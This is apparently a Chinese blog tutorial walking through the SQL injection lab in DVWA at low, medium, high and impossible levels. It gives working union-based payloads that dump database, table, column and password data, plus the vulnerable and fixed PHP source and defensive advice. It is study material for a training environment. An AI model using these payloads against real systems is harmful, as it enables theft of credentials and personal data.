DVWA-SQL Injection SQL注入

概念

SQL注入,是指将特殊构造的恶意SQL语句插入Web表单的输入或页面请求的查询字符串中,从而欺骗后端Web服务器以执行该恶意SQL语句。

成功的 SQL 注入漏洞可以从数据库中读取敏感数据、修改数据库数据(插入/更新/删除)、对数据库执行管理操作 (例如关闭 DBMS),恢复 DBMS 文件系统上存在的给定文件的内容 (load_file),并在某些情况下向操作系统发出命令。

SQL 注入攻击是一种注入攻击,其中 SQL 命令被注入到数据平面输入中,以便执行预定义的 SQL 命令。

这种攻击也可以称为"SQLi"。


目的

数据库中有 5 个用户,ID 从 1 到 5。您的任务...通过SQLi窃取他们的密码。

漏洞分析


分类

  • 参数类型:数字型、字符型(需要引号闭合)
  • 是否回显信息:回显注入和盲注
  • 注入位置:GET注入、POST注入、Cookie注入和搜索注入

危害

通过SQL注入漏洞,数据库中的关键数据可能会被窃取,如管理员的账号和密码、用户的身份证号码和手机号等个人信息;数据库中存储的数据可能会被篡改,以进行挂马、钓鱼或其他攻击方式的间接利用;甚至,在拥有较高权限时,可以直接获取Web Shell或者执行系统命令等。因此,SQL注入漏洞的危害是绝对不容小觑的。

低水平

输入id,在页面显示了id,first name和surname。

只输入一个',点击submit,出现了SQL错误提示,说明后台直接执行了SQL,可能存在了SQL注入。数据库执行了输入的特殊构造语句,可能存在SQL注入漏洞。

输入 1 or 1=1,显示了id为1的信息

输入 1 ' or 1=1 # 显示了所有用户的"First name"和"Surname",如图

在构造语句时,为了避免SELECT语句中额外增加限制子句,我们经常会在最后加上符号"#"。"#"是注释符,表示这个符号后面的语句不会被执行。

确认SQL注入类型后,我们可以构造SQL语句来获取数据库名。但是想要用SQL语句来获取数据库名,就需要在原来的SQL语句中再拼接一个SQL语句,也就是需要使用联合查询语句union。union语句要求前后两个SELECT子句的字段数相同,因此,我们必须先来获取查询语句的字段数。

输入1 ' or 1=1 order by 1 # ,发现结果按照First name排序,说明First name是查询结果第一个字段,1 ' or 1=1 order by 2 #,发现结果按照surname排序,说明是第二个字段

输入 1 ' or 1=1 order by 3 #,显示报错,说明SELECT子句的字段数为2。

构造union语句,1' union select 1,database()# 在第二个位置会显示数据库的名

获取数据库的表名:

在MySQL数据库中,有一个默认自带的系统数据库information_schema。该数据库本质上是一个视图,存储了数据库的元数据,也就是存储了所有数据库的相关信息,如数据库information_schema中的数据表TABLES中存储了数据库服务器中所有数据库的所有数据表的信息。 数据表information_schema.tables中显示的TABLE_SCHEMA字段为数据表所在的数据库名,TABLE_NAME字段为数据表名。这样,通过数据库的数据表information_schema.tables就能获取到dvwa数据库中存储了哪些数据表。
SELECT first_name, last_name FROM dvwa.users WHERE user_id = '1' UNION SELECT 1, table_name from information_schema.`TABLES` where TABLE_SCHEMA="dvwa"

可以看到dvwa有两个表,分别是guestbokk和users

  • 找到字段名

information_schema.columns表中显示了TABLE_SCHEMA(数据库名)、TABLE_NAME(数据表名)、COLUMN_NAME(字段名),以及其他数据信息

SELECT first_name, last_name FROM dvwa.users WHERE user_id = '1' UNION SELECT 1, column_name from information_schema.`COLUMNS` where TABLE_SCHEMA="dvwa"

1' UNION SELECT 1, column_name from information_schema.`COLUMNS` where TABLE_SCHEMA="dvwa"#

可以看到显示了表字段,包含user,passwword

  • 获取字段对应数据

找到账号密码,输入如下语句,可以看到输出了账号,密码信息。

1' UNION SELECT user, password from dvwa.users#

  • 密码解密

用户admin的密码是经过MD5加密后存储的数据,因此,想要获取明文密码,必须进行MD5解密。大家可以在线进行解密,比如通过在线网站CMD5进行解密

获取到了DVWA平台管理员用户的账号为admin,对应的密码为password。有了管理员用户的账号和密码,攻击者就可以使用管理员权限进入该平台,进行后续的入侵和破坏,比如在DVWA的网站上挂马、篡改网页内容

初级SQL手工注入渗透测试过程:

①判断系统是否可能存在SQL注入漏洞,以及SQL注入类型是数字型注入还是字符型注入。②获取SELECT语句的字段数,以使用联合查询语句union拼接想要执行的SELECT语句。基于MySQL系统数据库中的各个数据表和SQL语句语法构造用户输入,形成可在MySQL数据库中正确执行的语句以依次获取:数据库名→数据表名→指定数据表中的字段名→指定字段的数据。③获取管理员的用户名,并破解管理员的MD5密码。

从源码可以看到,从获取前端用户输入的id参数值到SQL语句的执行,没有设置任何对用户输入的防护,攻击者可以在查询表单的输入处实施SQL注入。

php 复制代码
$id = $_REQUEST[ 'id' ];

    switch ($_DVWA['SQLI_DB']) {
        case MYSQL:
            // Check database
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

            // Get results
            while( $row = mysqli_fetch_assoc( $result ) ) {
                // Get values
                $first = $row["first_name"];
                $last  = $row["last_name"];

                // Feedback for end user
                echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
            }

            mysqli_close($GLOBALS["___mysqli_ston"]);
            break;

中级

在中级中,选项为下拉菜单,且以post方式提交。无法直接在页面修改选项,需要使用burpsuite拦截后修改负载再发送。

  • 查找注入类型

使用参数 1 or 1=2,显示了所有结果,说明为数字型注入。

找到数据库名

获取的数据表名

4 union select 1,group_concat(table_name)from information_schema.tables where table_schema=′dvwa′#

发生错误,因为引号被转义为/

为了绕过防护,可以使用Burp Suite的Decoder模块,将"dvwa"直接转换为十六进制数据。在"Decoder"界面输入需要转换的字符串"dvwa",选择"Encode as"下拉列表中的"ASCII hex"选项,就可以获取到"dvwa"对应的十六进制数据"64767761"十六进制数据以"0x"开头,因此,"dvwa"对应的十六进制数据可以使用"0x64767761"表示

获取字段名

id=1 union select 1,group_concat(column_name)from information_schema.columns where table_name=0x7573657273#&Submit=Submit

获取字段对应数据

id=1 union select user,password from users#&Submit=Submit

中级使用SQL注入保护的一种形式,具有 "mysql_real_escape_string()"。 但是,由于 SQL 查询的参数周围没有引号,因此这不会完全保护查询不被更改。

php 复制代码
// Get input
    $id = $_POST[ 'id' ];

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

    switch ($_DVWA['SQLI_DB']) {
        case MYSQL:
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";

高水平

与初级、中级SQL手工注入渗透测试环境的源代码对比、分析可以发现:①id参数是通过SESSION的方式传递到后端的。②SQL语句中增加了"LIMIT 1"的限制,每次只能返回一条记录;③在发生错误时,不返回具体的错误信息,只返回提示语句"Something went wrong."。

php 复制代码
<?php

if( isset( $_SESSION [ 'id' ] ) ) {
    // Get input
    $id = $_SESSION[ 'id' ];

    switch ($_DVWA['SQLI_DB']) {
        case MYSQL:
            // Check database
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
            $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );

            // Get results
            while( $row = mysqli_fetch_assoc( $result ) ) {
                // Get values
                $first = $row["first_name"];
                $last  = $row["last_name"];

                // Feedback for end user
                echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
            }

            ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);        
            break;

使用# 来绕过limit 1的限制

1'or 1=1 # 说明为字符型注入

找到数据库名

1 ' union select 1,database()#

找到表名

1' union select 1,group_concat(table_name)from information_schema.`TABLES` where table_schema='dvwa'#

找到字段名

1'union select 1,group_concat(column_name)from information_schema.`COLUMNS` where table_name='users'#

高级防护,后端主要通过"LIMIT 1"来限制返回数据的个数,这个防护措施通过"#"注释符就可以轻松绕过高级

防护方法

1、输入验证和处理

客户端或服务器端对ID进行数字类型的检验,禁止字符的输入

其次,对特殊字符进行转义。如:对SQL注入过程中常用的单引号"′"、百分号"%"、下画线"_"等符号进行转义。PHP中的mysql_escape_string()函数就可以实现字符转义的功能。在客户端和服务器端对所有的输入数据进行长度、类型、范围、格式等的合规性检查,拒绝不合法数据的接收,并且对输入的特殊字符做一定的处理

2、数据库配置

数据库连接遵循"最小权限"原则。在Web应用程序访问数据库时,禁止任何管理员权限账户(如root、sa等)的连接。由于业务需求,可以单独为应用程序创建权限较低的账户,进行有限访问。其次,关键数据务必加密后存储。对于关键或敏感信息,可以加密或哈希后再存储到数据库,这样,攻击者即使获取到这些数据,也无法加以利用。

3、预编译和参数化语句

不可能的水平

php 复制代码
 $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
                $data->bindParam( ':id', $id, PDO::PARAM_INT );
                $data->execute();
                $row = $data->fetch();

                // Make sure only 1 result is returned
                if( $data->rowCount() == 1 ) {
                    // Get values
                    $first = $row[ 'first_name' ];
                    $last  = $row[ 'last_name' ];

                    // Feedback for end user
                    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
                }

对Impossible级SQL手工注入渗透测试环境的源代码进行分析可以发现,主要防护措施为:使用Anti-CSRF token防止CSRF攻击;通过prepare()函数进行预编译,绑定变量id,将代码和数据分离,且确保返回数据为1条,对SQL注入攻击进行有效防护。

参考《web渗透测试与防护 慕课版》

相关推荐
WTT00112 小时前
2024楚慧杯WP
大数据·运维·网络·安全·web安全·ctf
群联云防护小杜4 小时前
如何给负载均衡平台做好安全防御
运维·服务器·网络·网络协议·安全·负载均衡
ihengshuai4 小时前
HTTP协议及安全防范
网络协议·安全·http
黑客Jack5 小时前
防御 XSS 的七条原则
安全·web安全·xss
云云3216 小时前
怎么通过亚矩阵云手机实现营销?
大数据·服务器·安全·智能手机·矩阵
神一样的老师7 小时前
面向高精度网络的时间同步安全管理架构
网络·安全·架构
云云3218 小时前
云手机方案全解析
大数据·服务器·安全·智能手机·矩阵
云云3219 小时前
云手机能用来干什么?云手机在跨境电商领域的用途
服务器·线性代数·安全·智能手机·矩阵
云云3219 小时前
云手机方案总结
服务器·线性代数·安全·智能手机·矩阵
m0_7482370510 小时前
2024年“羊城杯”粤港澳大湾区网络安全大赛 初赛 Web&数据安全&AI 题解WriteUp
前端·安全·web安全